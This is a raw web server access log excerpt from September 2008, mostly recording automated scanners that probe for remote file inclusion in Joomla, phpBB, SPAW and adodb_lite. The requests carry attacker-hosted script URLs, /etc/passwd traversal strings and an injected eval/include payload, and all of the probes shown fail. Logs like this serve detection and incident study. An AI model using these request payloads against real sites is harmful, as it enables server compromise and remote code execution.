209.59.12.99 - - [02/Sep/2008:00:00:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.54.42.146 - - [02/Sep/2008:00:00:53 -0400] "GET /logs/access_log.Q108071000/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:00:54 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:00:54 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:00:54 -0400] "GET /logs/access_log.Q108062600/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:01:06 -0400] "GET /logs/access_log.Q108071000/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:01:06 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:01:07 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:01:07 -0400] "GET /logs/access_log.Q108062600/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810"
24.83.208.180 - - [02/Sep/2008:00:01:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
24.83.208.180 - - [02/Sep/2008:00:01:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
24.83.208.180 - - [02/Sep/2008:00:01:31 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
24.83.208.180 - - [02/Sep/2008:00:01:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
78.159.107.230 - - [02/Sep/2008:00:01:54 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.duzcesporluyuz.com/silinmiyor/components/com_qpersonel/did.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
78.159.107.230 - - [02/Sep/2008:00:01:54 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.duzcesporluyuz.com/silinmiyor/components/com_qpersonel/did.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
78.159.107.230 - - [02/Sep/2008:00:01:54 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.duzcesporluyuz.com/silinmiyor/components/com_qpersonel/did.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
78.159.107.230 - - [02/Sep/2008:00:02:07 -0400] "GET /logs/error_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.duzcesporluyuz.com/silinmiyor/components/com_qpersonel/did.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Sep/2008:00:03:36 -0400] "GET /logs/error_log.Q108021800%20//admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/f4t4l/id3.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
74.6.8.96 - - [02/Sep/2008:00:03:06 -0400] "GET /images/ACE_tutor_2Stage_Ridge.pdf HTTP/1.0" 200 1581415 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.238.52.92 - - [02/Sep/2008:00:04:05 -0400] "GET /logs/error_log.Q108061400//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
66.96.80.9 - - [02/Sep/2008:00:04:51 -0400] "GET /logs/access_log.Q108082300//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 379 "-" "libwww-perl/5.801"
66.96.80.9 - - [02/Sep/2008:00:04:51 -0400] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 352 "-" "libwww-perl/5.801"
66.96.80.9 - - [02/Sep/2008:00:04:51 -0400] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 357 "-" "libwww-perl/5.801"
217.147.236.10 - - [02/Sep/2008:00:05:07 -0400] "GET /logs/access_log.Q108061500//components/errors.php?error=http://l33tunix.t35.com/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
209.59.12.99 - - [02/Sep/2008:00:05:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.96.80.9 - - [02/Sep/2008:00:05:39 -0400] "GET /logs/error_log.Q108081500//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.marioni.info/alb2?? HTTP/1.1" 404 378 "-" "libwww-perl/5.801"
74.55.98.10 - - [02/Sep/2008:00:06:37 -0400] "GET /logs/access_log.Q108071000/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813"
74.55.98.10 - - [02/Sep/2008:00:06:38 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.813"
74.55.98.10 - - [02/Sep/2008:00:06:38 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.813"
74.55.98.10 - - [02/Sep/2008:00:06:38 -0400] "GET /logs/access_log.Q108062600/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813"
78.159.107.230 - - [02/Sep/2008:00:06:48 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.duzcesporluyuz.com/silinmiyor/components/com_qpersonel/did.txt? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
74.6.8.96 - - [02/Sep/2008:00:05:42 -0400] "GET /logs/access_log.Q107060800 HTTP/1.0" 200 2972073 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.96 - - [02/Sep/2008:00:06:03 -0400] "GET /logs/access_log.Q108020500 HTTP/1.0" 200 3344922 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
205.211.11.1 - - [02/Sep/2008:00:09:37 -0400] "GET /logs//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:00:09:37 -0400] "GET //includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:00:09:39 -0400] "GET /logs/error_log.Q108072800//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:00:09:42 -0400] "GET /logs/error_log.Q108072400//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
209.59.12.99 - - [02/Sep/2008:00:10:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.199.146 - - [02/Sep/2008:00:10:53 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
74.53.199.146 - - [02/Sep/2008:00:10:53 -0400] "GET /logs/access_log.Q108080900//index.php?DOCUMENT_ROOT=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.53.199.146 - - [02/Sep/2008:00:10:53 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
74.53.199.146 - - [02/Sep/2008:00:10:54 -0400] "GET /logs/error_log.Q108080900//index.php?DOCUMENT_ROOT=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
211.202.2.40 - - [02/Sep/2008:00:11:16 -0400] "GET /logs/error_log.Q108072700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.202.2.40 - - [02/Sep/2008:00:11:17 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.202.2.40 - - [02/Sep/2008:00:11:17 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
211.202.2.40 - - [02/Sep/2008:00:11:19 -0400] "GET /logs/access_log.Q108072700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
89.248.110.152 - - [02/Sep/2008:00:13:06 -0400] "GET /logs/access_log.Q108080900//index.php?DOCUMENT_ROOT=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.248.110.152 - - [02/Sep/2008:00:13:06 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
89.248.110.152 - - [02/Sep/2008:00:13:06 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
89.248.110.152 - - [02/Sep/2008:00:13:10 -0400] "GET /logs/error_log.Q108080900//index.php?DOCUMENT_ROOT=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.249.71.237 - - [02/Sep/2008:00:13:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L4F19932678041300A3C807D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.36.166.240 - - [02/Sep/2008:00:13:49 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:13:49 -0400] "GET /logs/error_log.Q108080100/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:00:13:50 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
209.59.12.99 - - [02/Sep/2008:00:15:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.21.71.133 - - [02/Sep/2008:00:17:35 -0400] "GET /logs/error_log.Q108071300//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/f4t4l/id3.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
84.21.71.133 - - [02/Sep/2008:00:17:36 -0400] "GET /logs/access_log.Q108081900//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/f4t4l/id3.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
74.6.8.96 - - [02/Sep/2008:00:16:23 -0400] "GET /logs/access_log.Q107100100 HTTP/1.0" 200 3725525 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.87.154.41 - - [02/Sep/2008:00:17:51 -0400] "GET ///vwar/backup/errors.php?error=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
211.202.2.40 - - [02/Sep/2008:00:18:11 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
213.238.52.92 - - [02/Sep/2008:00:18:25 -0400] "GET /logs/access_log.Q108062600/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.238.52.92 - - [02/Sep/2008:00:18:25 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
213.238.52.92 - - [02/Sep/2008:00:18:26 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
213.238.52.92 - - [02/Sep/2008:00:18:34 -0400] "GET /logs/error_log.Q108053000/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
74.55.98.10 - - [02/Sep/2008:00:20:11 -0400] "GET /logs/error_log.Q108071100//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.813"
74.55.98.10 - - [02/Sep/2008:00:20:11 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.813"
74.55.98.10 - - [02/Sep/2008:00:20:11 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.813"
89.188.122.50 - - [02/Sep/2008:00:20:14 -0400] "GET /logs/error_log.Q108081100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
89.188.122.50 - - [02/Sep/2008:00:20:14 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
89.188.122.50 - - [02/Sep/2008:00:20:14 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Sep/2008:00:20:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.59.71.79 - - [02/Sep/2008:00:20:27 -0400] "GET /logs/error_log.Q108071100//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.65"
64.59.71.79 - - [02/Sep/2008:00:20:27 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
64.59.71.79 - - [02/Sep/2008:00:20:27 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.65"
65.55.105.243 - - [02/Sep/2008:00:20:43 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.105.243 - - [02/Sep/2008:00:20:44 -0400] "GET /images/_notes/nav_store_fav_over_r1_c2.jpg.mno HTTP/1.1" 200 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.211.35.160 - - [02/Sep/2008:00:21:14 -0400] "GET /logs/access_log.Q108062600/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
83.211.35.160 - - [02/Sep/2008:00:21:14 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
83.211.35.160 - - [02/Sep/2008:00:21:19 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
83.211.35.160 - - [02/Sep/2008:00:21:28 -0400] "GET /logs/error_log.Q108081400/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
74.6.8.96 - - [02/Sep/2008:00:21:37 -0400] "GET /images/Office%20Supply/cell_background.psd HTTP/1.0" 200 34766 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.103.152.151 - - [02/Sep/2008:00:22:29 -0400] "GET /logs/access_log.Q108082400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 265 "-" "libwww-perl/5.810"
66.103.152.151 - - [02/Sep/2008:00:22:29 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
66.103.152.151 - - [02/Sep/2008:00:22:29 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
64.128.80.13 - - [02/Sep/2008:00:22:48 -0400] "GET //admin.remository.php?path_escape=http://www.hauntedbritain.net/ka.ng?? HTTP/1.1" 404 219 "-" "libwww-perl/5.811"
64.128.80.13 - - [02/Sep/2008:00:23:32 -0400] "GET /logs/error_log.Q108081300//admin.remository.php?path_escape=http://www.hauntedbritain.net/ka.ng?? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
64.128.80.13 - - [02/Sep/2008:00:23:33 -0400] "GET /logs//admin.remository.php?path_escape=http://www.hauntedbritain.net/ka.ng?? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
64.128.80.13 - - [02/Sep/2008:00:23:35 -0400] "GET /logs/access_log.Q108081300//admin.remository.php?path_escape=http://www.hauntedbritain.net/ka.ng?? HTTP/1.1" 404 246 "-" "libwww-perl/5.811"
66.103.152.151 - - [02/Sep/2008:00:23:38 -0400] "GET /logs/access_log.Q108082200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 265 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:24:15 -0400] "GET /logs/error_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:24:15 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.810"
74.54.42.146 - - [02/Sep/2008:00:24:15 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.810"
66.103.152.151 - - [02/Sep/2008:00:24:21 -0400] "GET /logs/access_log.Q108082400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://didik.wapath.com/script/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
66.103.152.151 - - [02/Sep/2008:00:24:21 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://didik.wapath.com/script/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
66.103.152.151 - - [02/Sep/2008:00:24:21 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://didik.wapath.com/script/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.36.166.240 - - [02/Sep/2008:00:24:24 -0400] "GET /logs/error_log.Q108051800/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
64.59.71.79 - - [02/Sep/2008:00:24:42 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 299 "-" "libwww-perl/5.65"
66.103.152.151 - - [02/Sep/2008:00:24:45 -0400] "GET /logs/access_log.Q108082200/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://didik.wapath.com/script/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
74.55.98.10 - - [02/Sep/2008:00:24:50 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 299 "-" "libwww-perl/5.813"
74.54.42.146 - - [02/Sep/2008:00:25:01 -0400] "GET /logs/access_log.Q108072300/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 291 "-" "libwww-perl/5.810"
74.6.8.96 - - [02/Sep/2008:00:25:10 -0400] "GET /logs/error_log.Q108070500 HTTP/1.0" 200 335047 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [02/Sep/2008:00:25:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.54.42.146 - - [02/Sep/2008:00:25:39 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://evikams.evi.com.hk/school_parent_kamlai/recommend/ids.txt? HTTP/1.1" 404 264 "-" "libwww-perl/5.810"
74.6.8.96 - - [02/Sep/2008:00:25:45 -0400] "GET /images/Office%20Supply/Thumbs.db HTTP/1.0" 200 60416 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.188.122.50 - - [02/Sep/2008:00:27:12 -0400] "GET /logs/access_log.Q108081100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.kamiah.org/ms/images/inc.png?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
205.211.11.1 - - [02/Sep/2008:00:27:40 -0400] "GET /logs/access_log.Q108072400%20//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
83.211.35.160 - - [02/Sep/2008:00:28:15 -0400] "GET /logs/access_log.Q108071000/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
87.248.163.41 - - [02/Sep/2008:00:29:30 -0400] "GET /logs/error_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
87.248.163.41 - - [02/Sep/2008:00:29:31 -0400] "GET /logs/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
87.248.163.41 - - [02/Sep/2008:00:29:31 -0400] "GET /basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
87.248.163.41 - - [02/Sep/2008:00:29:31 -0400] "GET /logs/access_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
213.238.52.92 - - [02/Sep/2008:00:29:35 -0400] "GET /logs/error_log.Q108071100//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
213.238.52.92 - - [02/Sep/2008:00:29:35 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
213.238.52.92 - - [02/Sep/2008:00:29:36 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.nwstars.com/arab.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
74.6.8.96 - - [02/Sep/2008:00:29:41 -0400] "GET /logs/access_log.Q107070400 HTTP/1.0" 200 1306644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.96 - - [02/Sep/2008:00:29:55 -0400] "GET /images/Office%20Supply/LCALEN.HTM HTTP/1.0" 200 7957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.165.80.16 - - [02/Sep/2008:00:30:17 -0400] "GET /logs/error_log.Q108081300/basepath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
